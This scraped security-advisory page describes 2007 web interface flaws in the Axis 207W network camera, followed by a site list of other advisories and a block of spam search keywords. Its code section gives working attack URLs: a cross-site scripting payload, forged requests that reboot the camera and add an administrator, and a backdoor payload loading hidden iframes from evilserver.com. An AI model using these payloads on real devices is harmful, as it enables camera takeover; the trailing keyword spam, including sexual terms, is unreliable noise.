exploits , vulnerabilities , articles , Axis Communications 207W Network Camera Web Interface Vulnerabilities

Title	Axis Communications 207W Network Camera Web Interface Vulnerabilities
Published	2007-09-14-12:00AM
Updated	2007-09-17-06:30PM
Class	Unknown
CVE
Remote	Yes
Local	No
Credit	Discovery is credited to Seth Fogie.
Vulnerable	Axis Communications 207W Network Camera 0
Not Vulnerable
Code	The following examples were provided:Cross-site scripting: http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>Cross-site request forgery: 1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi 2. Add a new administrator - http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh +tml%3Fpageclose%3D1 3. Root the camera/add a backdoor - http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe src=http://www.evilserver.com/wifi/axisrb.htm><!â??Denial of service: http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities
2009-12-17 Quick Heal AntiVirus Insecure Program File Permissions Local Privilege Escalation Vulnerability
2009-12-17 IntelliCom NetBiter webSCADA Multiple Default Password Security Bypass Vulnerabilities
2009-12-17 Webmatic Multiple Unspecified SQL Injection and Cross-Site Scripting Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 04:35:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
***girls WS FTPd www.hentai Sania mirz Www.petard - c99shel cuizhilong /search/ex slazyream WWW.VIDEO tamil pdf administra m...com_pe Www petard mambo Remo mambo Remo lifestil Www petard WRQ Reflec http://www www.video mushroom store mod mambo Remo sext girls www.dz1258 DI524 Saxyanimal Www soon18 stopzilla 24527.php wap.phoner www.animal veduo sxs C/r/n1c18/ JALISA 41142183.q Crack Data phpinject kavya www.aishwa www.hsinte t903t www.gujili crss news for c NUDE SOUTH vivvo/inde boso /search/ex